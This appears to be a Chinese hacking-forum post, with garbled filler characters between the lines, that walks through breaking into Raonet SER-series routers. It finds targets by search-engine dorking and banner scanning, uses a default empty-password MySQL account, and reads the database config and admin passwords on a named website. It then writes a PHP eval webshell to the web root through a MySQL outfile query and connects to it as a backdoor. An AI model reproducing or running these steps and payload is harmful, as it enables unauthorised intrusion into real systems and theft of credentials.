寻找存在漏洞的路由器方法:
& [( S. V4 Q7 X1 H
) q+ y4 H9 d0 l& w' I8 @( \1:google搜索'Raonet Subscriber Ethernet Router'. u* W+ b: o/ m$ {; C
- E: H1 N( ?& g2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001# E' d! Y9 I% ?8 F
/ l' `/ q# \* V3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。5 I" E6 I, }- z' x9 v7 f
% O% H. N/ J/ D# E$ u5 T1 ~//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......( m6 {: {+ Q& J& w6 ]1 Q7 F) n2 G1 R
8 o# ?, H% J* U0 q4 {6 s! x
, l( \6 ]: M. `6 Y+ u9 U
* e3 R" x* s" p入侵步骤:6 \4 s. }; z" D! h& y& w. l# m
2 y) S, r, G! m: V( E( D/ m1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php* r$ B$ o; @& r
5 B2 |+ t2 }: v& c- {
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc& `! S! Z" j8 ^1 y% K7 q
3:得到密码后连接,查看GUI管理密码:) _5 \, b8 C" i F/ k* C
use ser_500' [& n* O+ b: D! s4 ]( m/ P# ]
select id,passwd from user;
8 r4 o/ \9 n0 I9 d$ V; F' [4:通过数据库写入webshell,执行命令:% Q* g! s6 V# a3 \
use mysql;
: Q% K1 N0 B4 Pcreate table ok(cmd TEXT);
. y3 Y1 f/ l: @$ }+ ]insert into ok values("<?php @eval($_POST[cmd])?>");
! G5 L4 E) g8 z B5 N! @& Tselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
5 i3 m& ?* y+ D( R& [drop table ok;
8 j' V3 \9 I, u2 W9 a) m+ f
1 B+ l" G, d# `5 r1 L0 D5:连接后门shell.php
' N; ?; ^, N& k( ?4 P s' k& i3 B
6. 搞定!4 g* }9 A# T; Y* K9 E4 E5 _) l# k
+ h+ R& n4 A, |9 J6 g |